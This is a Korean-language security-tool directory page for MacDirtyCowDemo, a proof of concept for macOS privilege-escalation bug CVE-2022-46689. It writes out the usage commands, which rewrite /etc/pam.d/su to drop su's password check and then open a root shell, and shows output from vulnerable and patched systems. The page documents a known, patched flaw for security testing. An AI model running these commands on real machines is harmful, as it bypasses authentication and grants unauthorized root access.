Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
MacDirtyCowDemo — Apple의 XNU 소스에서 추출한 테스트케이스를 사용하여 macOS 13.0.1에서 CVE-2022-46689(Dirty Cow 버그의 macOS 버전)로 루트 권한을 획득합니다. | Kitploit
도구/GitHubGitHub/zhuowei/macdirtycowdemo
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed TeamingBinary Exploitation
GitHubzhuowei/macdirtycowdemo

MacDirtyCowDemo

Apple의 XNU 소스에서 추출한 테스트케이스를 사용하여 macOS 13.0.1에서 CVE-2022-46689(Dirty Cow 버그의 macOS 버전)로 루트 권한을 획득합니다.

저장소 보기
4103513년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

Apple의 XNU 소스에서 추출한 테스트 케이스를 사용하여 CVE-2022-46689(Dirty Cow 버그의 macOS 버전)로 macOS 13.0.1에서 루트 권한을 획득하세요.

https://worthdoingbadly.com/macdirtycow/

사용법

macOS 13.0.1 / 12.6.1(또는 이하) 기기에서 다음을 실행하세요:

root@kitploit:~
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su

다음과 같은 결과가 표시됩니다:

root@kitploit:~
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2# 

SIP를 끈 상태의 macOS 13 베타(22A5266r)에서 테스트했습니다(SIP가 켜져 있어도 작동합니다).

시스템이 완전히 패치된 경우(macOS 13.1 / 12.6.2)에는 대신 다음과 같이 표시됩니다:

root@kitploit:~
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure

그리고 su를 실행하면 여전히 비밀번호를 묻습니다.

Sealed System Volume 덕분에 /System 볼륨의 모든 파일에 대해 이 도구를 실행하면 파일이 일시적으로만 수정됩니다. 재부팅하면 원래대로 복원됩니다. 쓰기 가능한 볼륨의 파일에 실행하면 재부팅 후에도 수정 사항이 유지됩니다.

크레딧

  • 문제를 발견한 Project Zero의 Ian Beer. 분석 글이 기대됩니다!
  • 테스트 케이스를 제공한 Apple. (저는 아무것도 변경하지 않았습니다. 덮어쓸 대상을 제어하는 명령줄 매개변수만 추가했습니다.)
  • /etc/pam.d를 사용하여 비밀번호 확인을 비활성화하는 트릭을 제공한 SSLab@Gatech.
도구 다운로드